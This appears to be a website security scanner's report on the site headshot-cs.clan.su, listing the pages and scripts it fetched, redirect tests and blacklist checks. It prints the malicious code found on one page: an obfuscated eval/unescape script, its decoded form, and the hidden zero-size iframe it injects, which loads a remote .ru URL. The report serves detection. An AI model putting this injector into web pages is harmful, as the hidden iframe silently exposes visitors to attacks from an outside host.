Scanned pages/files
Request | Server response | Status |
http://headshot-cs.clan.su/index/0-11 | 200 OK Content-Length: 118891 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C115%2C56%2C46%2C115%2C116%2C101%2C97%2C100%2C121%2C104%2C111%2C115%2C116%2C46%2C114%2C117%2C58%2C56%2C49%2C47%2C126%2C101%2C108%2C118%2C105%2C122%2C105%2C47%2C105%2C99%2C101%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));
Decoded script:
document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,56,46,115,116,101,97,100,121,104,111,115,116,46,114,117,58,56,49,47,126,101,108,118,105,122,105,47,105,99,101,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62));
<iframe src="http://www.s8.steadyhost.ru:81/~elvizi/ice/index.php" width="0" height="0"></iframe>
Antivirus reports:
http://s7.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s7.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s7.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://www.ruscounter.com/count.php?site=7452 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.ruscounter.com/test404page.js | 404 Not Found Content-Length: 9626 Content-Type: text/html | clean |
http://1directory.ru/cnt.php?id=82 | 200 OK Content-Length: 20 Content-Type: text/html | clean |
http://1directory.ru/test404page.js | 404 Not Found Content-Length: 9822 Content-Type: text/html | clean |
http://1directory.ru/ | 200 OK Content-Length: 9822 Content-Type: text/html | clean |
http://1directory.ru/register.php | 200 OK Content-Length: 9571 Content-Type: text/html | clean |
http://1directory.ru/top.php?view=best | 200 OK Content-Length: 56642 Content-Type: text/html | clean |
http://1directory.ru/top.php?view=new | 200 OK Content-Length: 59678 Content-Type: text/html | clean |
http://1directory.ru/statistic.php | 200 OK Content-Length: 9206 Content-Type: text/html | clean |
http://1directory.ru/contacts.php | 200 OK Content-Length: 3602 Content-Type: text/html | clean |
http://1directory.ru/categories.php?cat=Avto_i_moto | 200 OK Content-Length: 32195 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: headshot-cs.clan.su
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: headshot-cs.clan.su
Referer: http://www.google.com/search?q=headshot-cs.clan.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=headshot-cs.clan.su
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://headshot-cs.clan.su/
Result: headshot-cs.clan.su is not infected or malware details are not published yet.